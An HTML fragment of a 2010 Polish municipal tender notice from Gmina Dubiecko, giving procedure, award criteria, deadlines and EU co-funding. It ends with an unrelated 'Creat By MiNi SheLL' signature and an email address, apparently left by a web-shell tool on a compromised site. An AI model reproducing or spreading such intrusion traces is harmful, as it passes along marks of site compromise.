<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dubiecko.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy Dubiecko, ul. Przemyska 10, 37-750 Dubiecko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2010 godzina 10:00, miejsce: Urząd Gminy Dubiecko - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie bedzie dofinasowane z Regionalnego Programu Operacyjnego Województwa Podkarpackiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com